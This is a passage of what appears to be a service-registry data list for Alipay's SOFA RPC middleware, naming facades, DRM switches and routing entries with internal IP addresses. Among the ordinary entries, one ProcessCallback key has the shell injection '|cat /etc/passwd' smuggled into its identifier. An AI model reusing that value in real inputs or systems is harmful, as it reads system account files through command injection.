OFA.DRM","com.alipay.mrchpunish.facade.cicada.complainEvent.ComplainEventMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.192.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icif.service.facade.api.PrivilegeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.question.structured.facade.WordSynonymService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.postmen.api.MessageApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.facade.dr.LdcDrSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyProcessManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.QualityConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectcore.common.service.facade.api.SelectCatalogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ocp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_BBC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.54.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.OpenOperatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstm.common.service.facade.mart.facade.SPUSKUFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.funds.FundsRiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITBILLCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_EXRATECENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.zbdm.common.service.facade.biz.BizTableInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:|cat /etc/passwd#@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.service.dtm.service.CommonTbaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcateringprod.common.service.facade.batchtask.BatchTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.biz.api.manager.ApiSyncToTopManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.transin.YebsAllSceneTransInQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkstmtcore.common.service.facade.sign.SignServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.DefaultConfirmAndProfitDateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeDRMConfigureImpl.refundEventLoadCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_INSHEALTHCLAIMMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.cacheLogDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","_CLIENTSERVICE_TEST_2_1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.custprod.service.api.PersonalLevelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secudownload.common.service.facade.fatigue.FatigueRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iotDeviceMall_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmratecust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antfin.rayag.facade.service.job.OlapJobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.PerformanceSwitcher.checkPointLogEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:finaggexpbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.190.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cschannel.common.service.facade.api.prod.mng.MadaProdRolesService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icashiercore.common.service.facade.api.CashierOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.AppInfoScoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.finfundprotocol.FundContractFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.BizTreeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_ACCOUNT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.acctrans.facade.api.acctrans.AcctransManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.80.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.aliyun.openservices.ons.api.MessageListener:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdmp.facade.PcdmpCollectDataTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.jobbulid.KgExtractConfigBuildService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.ITopologyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataservice.common.service.facade.BizOperationQueryService:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.rate.RateConfigureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.SystemConfigFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_O_RISKMNG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilelbs.common.service.facade.ReverseGeoCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","csactive@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finassistantservice.common.service.facade.api.AssistantDialogHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.selfopact.SelfOpActQueryFacad:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.DsdbMerchantSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.luckystar.LuckyStarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.184.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinbaseprod.common.service.facade.api.QueryPlanDBFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.openapi.CrawlerMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_O_ORDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prizecore.common.service.facade.mng.PrizeSecretCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.dsdb.biz.service.GrayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.163.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:promocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.exratecenterTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditcore.delayrepay.service.PcreditDelayRepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.250.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileacauth.service.facade.ctu.InitialCtuFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchdtunical.common.service.facade.OdpsSqlGrammarCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_ALI_HR_MASTERDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.RefreshClientConfigDRM.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hainaprod.common.service.facade.api.market.resource.MarketResourceVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdecision.service.PcreditAmountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.withdraw.api.ApplySyncContractBacsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmpcore.common.service.facade.VocabularyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lego.common.service.facade.data.GrayMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:frastress_commonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdPropertyMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accountcore.common.service.facade.AccountTransferFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilelbs@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recon.common.service.facade.fund.api.ReconcileFundItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_G_SETTLEGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.96.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.useSelfUUIDGenerator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.rcr.RcrManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationStrategyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tfapi.ManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.dchain.common.facade.api.comparam.InstPbcQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.giftprod.amy.service.facade.LargeGiftStockServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.common.FileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.common.service.facade.deposit.offline.DirectDepositFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:omegakoi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dwalm.core.service.fluidmng.cash.suggest.CashDemandSuggestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.ApiServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_YEBCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.intimatepay.IntimatePayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.girisk.strategy.service.facade.api.strategy.StrategyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:imobilewallet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:finrobotweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exctrade.service.facade.ExcTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.limitHasAssetPlanNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finquotationcenter.common.service.facade.api.TestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.investtrade.facade.api.option.OptionFairValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cfmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:postmen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.openservice.OpenServiceInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_MESHYFBI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.171.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.pet.PetFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.updatableBiz,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.antassistant.AssistantCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.distribution.pool.api.DistributionPoolEntityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@ipsponsorprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_prodArrGrayOpenCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.notify.bubble.service.impl.BubbleQuerySPIService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.userdata.BenefitUserDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.ApiConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","socplt@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.WTTicketActorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:memberexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.fund.FundManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfoprod.common.service.facade.FinfoFeedbackInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:alinode#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.24.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assetlibview.facade.api.ReceiptPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:zskynet@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerRiskRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.BackendDisplayCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@instportalmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:cn.com.antcloud.guardianconsole.facade.configs.service.GuardianConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.spr-fund-redeem-execute-unknown.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.riskmng_crawlDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.128.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:wowtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finriskportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2TickFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsFreezeOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.guardianconsole.facade.configs.service.ConfigsManagementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:unibase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.neardata.query.api.PriceConsultClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.galaxy.XMktActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.merchant.common.service.facade.OrderLinkQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LpSystemtimeResource.systemTimeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:zmCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancore.p2p.service.facade.repay.api.P2pRepayManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopCommonService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.service.facade.SnbInvokerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.SysConsoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.lineage.DataServiceLineageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sentinel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_MINITRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finfundtaskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iagreement.service.facade.api.AgreementCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.graycore.common.service.facade.api.grayroute.GrayRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.124.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_4003_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openitemcore.common.service.facade.api.selection.SelectionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.partnerprofilequery.facade.PartnerProfilesQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.media.api.MediaDetailGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.secdatacontext.common.facade.api.manage.DataNodeTypeVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.poscore:name=com.alipay.metadata.conf.cache.LoadCacheSwitch.loadCaheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finrepaycenter.common.service.facade.RepayProductOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promoplaycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.OrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.spi.TdatTaskDetailFacade:1.0:CI@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.biz.module.manager.InsIopSceneManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:sportsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.file.BaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.repo.rpc.RevolModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityCrowdMerchantAppendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordercore:name=com.alipay.ordercore.mrch.flood.control.keyBizSSuCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mquery.common.service.facade.ReportCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketActivityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.116.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.counter.api.CounterQueryFacadeV3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_capitalRansomCallBack1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.ampf.MiniAppAmpeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:virtualprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:almcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.salesplan.SalesPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditamount.prod.facade.AmountConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.dal.logsim.tccparseddata.OeEmulatorTccParsedDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.24.1.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finadvisorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.SnapshotMsgDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.a